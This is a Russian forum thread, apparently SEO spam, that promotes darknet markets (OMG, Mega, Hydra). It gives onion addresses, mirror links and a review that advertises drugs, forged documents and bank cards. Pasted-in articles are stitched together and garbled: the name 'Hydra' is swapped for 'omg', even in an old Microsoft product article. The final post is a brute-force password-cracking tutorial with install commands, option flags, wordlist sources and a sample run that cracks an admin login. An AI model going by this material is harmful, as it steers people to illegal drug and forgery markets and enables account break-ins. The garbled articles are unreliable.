Ramp ссылки телеграмм

Ehaca

Администратор
Подтвержденный
Сообщения
655
Реакции
29
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



O

Ocuhuh

Пассажир
Сообщения
77
Реакции
23
Ramp ссылки телеграмм
Интернет Интернет-ПО Интернет-доступ ТехникаУвидела свет очередная версия Tor Browser – браузера с акцентом на безопасность и анонимность, который работает через систему прокси-серверов Tor. Релиз 10.5. порадует пользователей из стран, в которых Tor заблокирован властями. Теперь обойти данное ограничение гораздо проще, потребуется сделать всего пару кликов.Релиз Tor Browser 10.5Американская некоммерческая организация Tor Project выпустила значительное обновление специализированного браузера Tor Browser 10.5, который предназначен для безопасной и анонимной навигации в интернете.Основанная на Mozilla Firefox 78 сборка, в частности, предлагает улучшенные возможности по обходу онлайн-цензуры. Теперь пользователи из стран, в которых Tor заблокирован властями, смогут легко обойти данное ограничение – достаточно активировать единственную функцию в настройках браузера, что можно сделать в пару кликов. Для этого используется обширная сеть прокси-серверов Snowflake.Работу данной сети поддерживают пользователи-добровольцы из «свободных стран» с низким уровнем интернет-цензуры. Примечательно, что вступление в их ряды не требует владения специальными навыками или финансовых вложений. Достаточно лишь установить специальное расширение для браузера Google Chrome или Mozilla Firefox.Состоялся rampcenter релиз Tor Browser 10.5Помимо усовершенествованных функций для борьбы с цензурой, Tor Browser получил обновленный интерфейс диалога первого подключения к сети Tor. Кроме того, анонимный обозреватель отныне предупреждает пользователей, если посещаемый скрытый (onion, «луковый») сайт использует устаревшие технологии и вскоре перестанет быть доступен.Что такое TorTor является системой серверов, поддерживающих «луковую маршрутизацию» – технологию анонимного обмена информацией через компьютерную сеть. Tor дает пользователю возможность сохранять инкогнито в интернете и защищает его трафик от анализа.Работу сети Tor обеспечивают узлы (серверы, relays) четырех типов: входные (Guard), посредники (Middle), выходные (Exit) и мосты (Bridge).Входные и выходные узлы, как следует из их названия, являются начальной и конечной точками в маршруте пользовательского трафика, проходящего через сеть Tor.Узлы-посредники занимаются тем, что «перебрасываются» трафиком друг с другом, прежде чем тот покинет сеть. Это необходимо для того, чтобы сделать источник трафика максимально неочевидным для тех, кто пожелает его отследить.IP-адреса входных узлов являются открытой информацией и могут быть загружены из одного из девяти публичных каталогов. Данная особенность позволила властям стран, которые настроены недружелюбно по отношению к Tor, закрыть доступ своим гражданам к данному инструменту, просто заблокировав каталоги IP-адресов.Как Tor помогает обходить блокировкиДля того, чтобы решить проблему цензуры, были придуманы мосты – входные узлы, адреса которых отсутствуют в публичном доступе. Получить адрес моста можно по специальному запросу, что одновременно усложняет жизнь пользователю и блокировку доступа к Tor властям.В некоторых странах, например, в Китае и Иране, научились бороться с данным видом защиты от цензуры, однако Tor Project в ответ на это предложил использовать так называемые транспорты, которые усложняют блокировку узлов. К примеру, в Tor Browser сравнительно давно встроена поддержка транспорта obfs4, который осуществляет обфускацию (запутывание) трафика.Новый транспорт, поддержка которого появилась в Tor Browser 10, называется Snowflake. Технология опирается на одноименную добровольческую сеть прокси-серверов, которая, по данным Tor Project, насчитывает 8 тыс. машин. Взаимодействие с прокси осуществляется при помощи P2P-проторола WebRTC. При инициализации соединения и выборе «пары» из Snowflake-прокси применяется техника «прикрытия доменом» (Domain Fronting).Модуль «Управление уязвимостями» на платформе Security Vision: как выявить и устранить уязвимости в своей ИТ-инфраструктуреБезопасностьЛюбопытной особенностью сети, которая позволяет ей очень быстро набирать участников, является простота настройки сервера. В сущности, никакой настройки и не требуется – добровольцу достаточно установить дополнение для Chrome или Firefox, которое и выполняет роль прокси-сервера в те моменты, когда браузер запущен.Таким образом формируется постоянно видоизменяющаяся сеть прокси-серверов, которую ввиду такого ее характера непросто заблокировать – IP-адреса добровольцев во многих случаях будут регулярно меняться, часть из них будет пользоваться различными точками доступа, в том числе публичными. Важно лишь, чтобы владельцы Snowflake-прокси оставались на территории стран с низким уровнем интернет-цензуры, иначе их вклад в общее дело окажется практически нулевым.Интерес властей к TorTor вызывает интерес у правоохранительных органов некоторых стран. Ведь с его помощью можно получить доступ к сайтам с запрещенной информацией и совершать нелегальные сделки в даркнете, при этом скрывая свою личность. Поэтому желание властей взять под контроль «луковый» сегмент интернета не должно вызывать удивления.В 2014 г. Федеральное бюро расследований (ФБР) заплатило $1 млн исследователям из Университета Карнеги-Меллон в США за помощь в проникновении в Tor с целью деанонимизации его пользователей.В августе 2019 г. CNews писал, что всего за несколько тысяч долларов в месяц сеть Tor можно настолько замедлить, что пользователи просто откажутся в ней работать. Американские исследователи предложили на выбор три вида атаки: на мосты, на узлы и на систему распределения трафика. Стоимость варьируется от $1,6 тыс. до $17 тыс. в месяц, что легко может себе позволить любое правительство.Российские власти также знают о существовании Tor. Принятый в 2017 г. закон обязует анонимайзеры, к которым относится Tor, и VPN-провайдеров блокировать сайты и сервисы из черного списка Роскомнадзора. Tor эти требования не выполняет.В июле 2019 г. хакерская группировка 0v1ru$ взломала сервер компании «Сайтэк», якобы являющейся подрядчиком российских спецслужб и других госструктур. Полученные в результате атаки документы содержали информацию о ряде тайных проектов, нацеленных, в том числе, на анализ трафика сети Tor.В середине июня 2021 г. Роскомнадзор ввел ограничительные мер в отношении VPN-сервисов VyprVPN и Opera VPN. Регулятор объяснил это тем, что данные сервисы используются для доступа к запрещенной в России информации – детской порнографии, суицидальному, пронаркотическому и подобному нелегальному контенту.На момент публикации данного материала доступ к сети Tor на территории России не ограничен и возможен без использования мостов.Дмитрий Степанов

 

Oqobu

Юзер
Сообщения
94
Реакции
7
”Супертонкий” клиент omg поддерживает различные платформы omg (“ОМГ”), находящаяся в разработке многопользовательская система корпорации Microsoft (Редмонд, шт. Вашингтон) для Windows NT, будет поддерживать большинство имеющихся настольных систем благодаря подключаемому модулю для сервера WinFrame фирмы Citrix Systems. Официальные документы на продукт, выставленные на Web-узле корпорации Microsoft в начале июня, описывают omg как “супертонкий” клиент, который сможет работать “как родной” на настольных системах под Windows NT Workstation, Windows 95 и Windows 3.x, а также на еще не определенном аппаратном обеспечении Windows Terminal. Поддержка X-терминалов и рабочих станций под Unix будет обеспечиваться подключаемым модулем для WinFrame и протоколом интеллектуальной архитектуры консоли (ICA). Однако пользователям придется работать с WinFrame. Насколько же “тонок” этот “супертонкий” клиент? По данным менеджера группы продуктов Microsoft Джона Фредриксена, хотя технология пока находится в стадии разработки, заданные параметры для самого малого из клиентов  -  Windows Terminal  -  составляют 4 Мб ПЗУ и 4 Мб ОЗУ. Клиент содержит минимум информации для загрузки удаленного настольного ПК и установки соединения с сервером, а также обеспечивает интерфейс пользователя. Сервер осуществляет все остальные функции операционной системы. Профиль пользователя также хранится на сервере. Система omg должна быть выпущена в виде бета-версии в IV квартале. Она будет доступна как дополнение к Windows NT 4.0. Представители Microsoft говорят, что они еще не решили, как связать продукт с Windows NT 5.0. Первая версия многопользовательской системы будет основана на модифицированной версии сервера WinFrame фирмы Citrix. В будущие версии войдет технология, лицензия на которую получена у Prologue Software. Эта технология позволит многочисленным клиентам связываться с серверами через подключаемые карты, а также по сети. Как предполагает Стив Клейнхенс, аналитик фирмы MetaGroup (Уэстпорт, шт. Коннектикут), тесные связи omg с WinFrame означают, что для Citrix обеспечено еще два или три года продаж продукта. Однако после этого рынок Citrix начнет сужаться, так как многопользовательские функции будут внесены в ядро Windows NT. “Есть много сходства со Stac”,  -  сказал он. В конечном счете фирма Stac похоронила в 1995 г. свой самый продаваемый продукт для сжатия диска, Stacker. Бесплатно предлагаемый сходный продукт Microsoft вкупе с падением цен на жесткие диски уничтожил рынок для Stacker. Большинство Windows NT-приложений будет работать как приложения omg, хотя могут возникнуть проблемы при совместном использовании документов или файлов. Например, если все пользователи осуществляют доступ к одному и тому же каталогу “Temp” на сервере, они могут в конце концов считывать и записывать одну и ту же копию файла. “Мы собираемся прояснить основные направления логотипа Windows, благодаря чему разработчики и станут лучше понимать, где при создании многопользовательского приложения могут встретиться проблемы”,  -  cчитает Фредриксен. Представители корпорации Microsoft ожидают, что число клиентов будет почти таким же, как на WinFrame. В настоящее время WinFrame имеет в среднем от 10 до 15 клиентов на сервер, хотя тестирование показало, по словам Фредриксена, возможность подключения до 200 клиентов в зависимости от аппаратного обеспечения и приложений. Телефон московского представительства Microsoft: (095) 967-8585, Web-адрес: www.microsoft.com. Норвин ЛичТолько зарегистрированные пользователи могут оставлять комментарий.
Ramp ссылки телеграмм
 
U

Uqusib

Юзер
Сообщения
39
Реакции
2
ОМГ магазин в онион - драгмаркет нового поколения, функционирует на всей территории всего бывшего Союза, на данный момент плотно "заселены" дилерами всех районов РФ, доступен 24 часа в сутки, 7 дней в неделю, круглосуточная онлайн-поддержка, авто-гарант, автоматические продажи за рубли или биткоин.Ссылка на магазин - Рабочее зеркало для браузеров без Tor подключенияОбратите внимание! Существует куча фейковых площадок сделанных на домене onion, у оригинальной магазина после omgruzxpnew4af идёт слово onion, внимательно проверяйте адрес магазина.Давайте рассмотрим внимательно, что за странный исполин о 3-x головах:Встречают часто по одёжке, те времена когда магазины в даркнете были простыми давно прошли, ОМГ onion говорит нам Wellcome дорогим простым дизайном, видна огромная работа, каждый пиксель выверен. Функционал предоставлен чудовищный, здесь есть все - регистрация, курс btc/рубль, товары, магазины, возможность создания защищенных сообщений, удобная строка поиска с возможностью выбора своего города. Главная страница магазина нас встречает большим списком надёжных магазинов, работающих не первый день, в самом низу страницы можно найти раздел новостей, куда ежедневно выкладывают свежие новости, конечно не такие интересные как у нас :).По словам администрации ОМГ тор, сайт полностью написан с нуля, что даёт гарантию отсутствия частых уязвимостей в безопасности, насколько нам известно код писался ОМГ онион магазина не менее года, "супермаркет" работает с 2015 года, никаких новостей об утечке данных, взломе, краж bitcoin за все время не было, из чего имеем полное право сделать вывод, что криптомаркет безопасен.Дальше в нашем обзоре будет рассмотрен весь волшебный зверь, но давайте о главном, то что действительно актуально для каждого пользователя и потенциального покупателя. Очень важно - товар и цены, сказать, что на Гидре разнообразный товар, это ничего не сказать, в продаже весь спектр документов на все случаи жизни ОСАГО, акцизные марки табака и алкоголя, водительские удостоверения любых стран, дипломы высшего образования, получение гражданства Украины или Молдовы, дебетовые карты разных банков, sim-карты операторов связи России, Азии, Европы, флешки с безопасными ОС, схемы заработка, и конечно разнообразные психо-активные вещества, марихуана, амфетамин, героин, бошки, гашиш, a-pvp, mdvp, экстази, грибы, марки, кокаин, мефедрон, полный список смотрите сами.Ценообразование, нам хотелось бы упомянуть, что цены на ОМГ тор копеечные и всё отдают почти даром, но это не так. Как известно в наш век, хороший товар - хорошо стоит, и можно было бы испугаться цен, которые были изначально, но рыночная экономика сыграла злую шутку, и новые головы (новые продавцы), чтобы получить приток покупателей к себе, стали снижать цены на товар до минимальных, тем самым начиная демпинговать, принуждая других игроков рынка со временем также снижать стоимость, так как вечно получить сверхприбыль нельзя. На данный момент, цены на все товары стали вполне приятными, но учитывая постоянный рост аудитории и геометрически увеличивающиеся количество новых барыг Гидры, цены претерпят в будущем корректировку, скорее всего рынок будет диктовать правила снижения ценников, для более захватывающей, конкуретной борьбы за продажи. Для безопасности покупателей работает система авто-гаранта, как это выглядит? Любая продажа проходящая в магазине, автоматически "страхуется", в случае споров к беседе присоединяется представитель администрации. Из полезных новинок - моментальные покупки, возможность быстро приобрести необходимый товар, без ожидания подтверждения транзакции в blockchain, что очень удобно, так как транзакция может подтвердиться и через сутки, оплата в btc и киви, как в старые добрые времена просто, пополнить баланс сайта можно даже через Сбербанк! Разумеется доступен предзаказ, но здесь уже лучше обсуждать нюансы с продавцом. По заявлению администрации все торгаши проходят проверку, т.е. все представленные магазины 100% не обманщики, что само собой разумеется, так как бесплатно на торговой площадке никого размещать не будут, помимо этого администрация контролирует качество работы магазинов веерными закупками. Внутри встроен мессенджер, аналог ватсапа, у которого даже есть хештеги, ещё бы лайки приделали :), распределение на группы, приватные беседы и многое другое, нам кажется данный функционал гораздо более полезен продажникам для становления "корпоративной" сети. Более всего улыбает система технической поддержки, которая работает онлайн, в чат можно пригласить модератора, для разрешения любой спорной ситуации, даже в праздники отвечают довольно быстро, мы проверяли 1 января, как только модератор принял решение, всем участникам беседы приходит об этом сообщение. =) Внутри магазина большой функционал, система самосжигающихся записок, отзывы покупателей о всех продавцах, система рейтинга, десятибальная шкала оценки маркетов, возможность оставлять отзывы после каждой покупки, общий рейтинг продавцов, рейтинг покупателей, отображается количество успешных сделок совершённых продавцом и тд и тп.Заключение.omg tor во истину огромный исполин о трёх головах, движение которого крайне трудно определить, у данного сайта нет определённой аудитории, он охватывает все сферы теневого бизнеса, от продажи ПАВ до торговли документами и банковскими картами, география и объём можно сравнить разве что с Avito, который известен каждому пользователю обычного интернета. Естественно такой огромный драгмаркет в онионе ярко выделяется и сильно заметен, он манит разносторонную публику и, скорее всего, именно это желание всего и вся может сыграть злую шутку, но ведь для этого у omg на каждое дело отдельная голова, отрубишь одну вырастут две, как известно, на данный момент это лидер рынка, за что и занимает первую строчку нашего рейтинга. Что ещё сказать?Сейчас ОМГ крайне популярна в сети, у неё даже появились зеркала, например, сайты предоставляют своим посетителям быстрый вход на сайт магазина. Проект ОМГ в онион расположен, обязательно сверяйте адрес ссылки куда заходите, вот 100% рабочая и настоящая ссылка.Что как то слишком отлично получилось, такое даже у вас ощущение, что статья заказная, слишком всё в ней хорошо, ложка дёгтя необходима, и ложка дёгтя есть в том, что проект новый, крайне амбициозный, сайту менее трех лет, хоть он и развивается мелкими шагами, но что будет в будущем покажет только время.
 

Demumywi

Юзер
Сообщения
29
Реакции
10
Не работает сайт ОМГ?Сайт ОМГНе работает сайт ОМГ? - Да, действительно такое часто бывает, в особенности в выходные дни, связано это с активными DDoS - атаками на сайт ОМГ со стороны конкурентов и иных лиц в частности. Если вы испытываете сложность к доступу на omg, воспользуйтесь ссылками указанными ниже:Ссылка на ОМГ сайт зеркало - omg2web.cmСсылка на ОМГ через Tor: omgrulqno4hoio.onionЧто такое "Зеркало на...20 julio, 2020/
 
M

Mulev

Юзер
Сообщения
81
Реакции
11
ОМГ вход в обходQamomТип сайта, Даркнет-рынок. ОМГ официальный сайт напичкан в себе дополнительными возможностями. Место, где пользователь из РФ или СНГ может приобрести товары и услуги, не представленные. Аксессуар помещается в рюкзак, трубка перекидывается через плечо и крепится либо специальной петлей, либо каким-нибудь другим способом (обычно предусмотрено…
 

Fybador

Юзер
Сообщения
80
Реакции
2
Полезный универсальный инструмент для подбора паролей при проведения тестов на уязвимость собственных ресурсов ;)Внимание! Статья носит исключительно ознакомительную информацию с утилитой и ни в коем случае не призывает использовать её в мошеннических целях. Как правило, данная утилита может быть использована для проведения тестов на уязвимость собственных ресурсов. Не забывайте предохраняться и натянуть на себя VPN хотя бы.Когда penetration testing заходит в тупик, остается крайний метод - подбор пароля. Дабы уницифировать все инструменты подбора паролей и не использовать для разных задач отдельные брутфорсы есть замечательный универсальный инструмент - THC-omg, который имеет поддержку пароля по/для Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.УстановкаПакет omg содержится в epel-репозитории, поэтому достаточно подключить его и установить.yum install -y epel-release
yum install -y omg
Или собрать с сорсов для пользователей других ОС:mkdir ~/omg_src && cd ~/omg_src
wget https://github.com/vanhauser-thc/thc-omg/archive/master.zip && unzip master.zip && rm -f master.zip
cd thc-omg-master/
yum install gcc mysql-devel libssh
make clean && ./configure
make && make install
omg -h
omg v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: omg [-C FILE] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3digest}md5[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
omg is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-omg
These services were not compiled in: sapr3 afp ncp oracle.
Use omg_PROXY_HTTP/omg_PROXY and omg_PROXY_AUTH environment for a proxy.
E.g.: % export HTTP_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
% export HTTP_PROXY_HTTP=http://proxy:8080
% export HTTP_PROXY_AUTH=user:pass
Examples:
omg -l user -P passlist.txt ftp://192.168.0.1
omg -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
omg -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
СловариБрутить можно как с помощью подбора посимвольно, так и с помощью подготовленного словаря наиболее часто используемых паролей. Рекомендую первым делом попытаться подобрать пароль со словарем, и уже если и этот способ не увенчался успехом — переходить к прямому бруту посмивольно.Словари можно поискать здесь или воспользоваться имеющимися.Готовые списки паролей: top500; top4000; cain&abel (300k); пароли от яндекса (700k); пароли от маил.ру (2740k); маил.ру + яндекс (3300k)ИспользованиеРассмотрим флаги запуска:-R Восстановить предыдущую сессию, которая по какой-либо причине была прервана-S Использовать SSL соединение-s PORT Указание порта (отличного от дефолтного) сервиса-l LOGIN Использовать указанный логин для попытки аутентификации-L FILE Использовать список логинов из указанного файла-p PASS Использовать указанный пароль для попытки аутентификации-P FILE Использовать список паролей из указанного файла-x Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN — это минимальная длинна пароля, MAX — соответственно, максимальная, а CHARSET — это набор символов, в котором a означает латиницу в нижнем регистре, A — в верхнем регистре, 1 — числа, а для указания дополнительных символов — просто укажи их как есть. Вот несколько примеров генерации паролей:-x 3:5:a — длинной от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре;-x 5:8:A1 — длинной от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр;-x 1:3:/ — длинной от 1 до 3 символов, состоящие только из символов слеша /;-x 5:5:/%,.- — длинной в 5 символов, состоящие только из символов /%,.-;-e nsr Укажи n для проверки пустых паролей, s для попытки использования в качестве пароля — логин, и (или) r для попытки входа под перевернутым логином-u Пытаться подобрать логин а не пароль-C FILE Использовать файл в формате login:pass вместо указания -L/-P-M FILE Файл со списком целей для брутфорса (можно с указанием порта через двоеточие), по одному на строку-o FILE Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout (будет указан с указанием сервера, к которому подобран — не запутаешься)-f / -F Прекратить работу, как только первая пара логин:пароль будет подобрана. -f только для текущего хоста, -F — глобально.-t TASKS Количество параллельных процессов (читай — потоков). По умолчанию 16-w Таймаут для ответа сервера. По умолчанию 32 секунды-W Таймаут между ответами сервера-4 / -6 Использовать IPv4 (по умолчанию) или IPv6 адреса (при указании с -M всегда заключай в [])-v Более подробный вывод информации о процессе-V Выводить каждый подбираемый логин + пароль-d Режим дебага-O Использовать старый SSL v2 и v3-q Не выводить сообщения об ошибках подключения-U Дополнительная информация о использовании выбранного модуля-h Вывод справочной информацииПримеры работыBasic AuthenticationCканируя диапазон адресов мы попадаем на некоторый интерфейс, доступный по http протоколу, но закрытый для доступа при помощи Basic Authentication (пример настройки с помощью nginx).IP сервера: 192.168.2.15;Сервис: http;Путь, который закрыт для нас запросом пары логин/пароль: /admin/;Порт, на котором работает http сервер: 80;Предположим (или любым доступным путем выясним), что логин для авторизации admin, и нам неизвестен лишь пароль. Подбирать будем с помощью заранее подготовленного словаря и с использованием модуля http-get:[[email protected] opt]# omg -l admin -P /opt/pass.txt -o ./omg_result.log -f -V -s 80 192.168.2.15 http-get /admin/
omg v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
omg (http://www.thc.org/thc-omg) starting at 2016-06-08 14:37:45
[DATA] 16 tasks, 1 server, 234 login tries (l:1/p:234), ~14 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt1311113" - 1 of 234 [child 0]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt19391936" - 2 of 234 [child 1]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt2006pp" - 3 of 234 [child 2]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt21l16" - 4 of 234 [child 3]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt5390" - 5 of 234 [child 4]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "slt911pvpsw2" - 6 of 234 [child 5]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "sltanya" - 7 of 234 [child 6]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "admin" - 8 of 234 [child 7]
[ATTEMPT] target 192.168.2.15 - login "admin" - pass "password" - 9 of 234 [child 8]
...
[80][www] host: 192.168.2.15 login: admin password: password
[STATUS] attack finished for 192.168.2.15 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Статья ожидает продолжения..
 

Похожие темы

  • Ofadyqy
  • 17 Сент 2021, 21:12
  • Pytar
  • 17 Сент 2021, 09:56
  • Ytuwasyp
  • 17 Сент 2021, 23:00
  • Tolobudy
  • 17 Сент 2021, 12:45
Сверху Снизу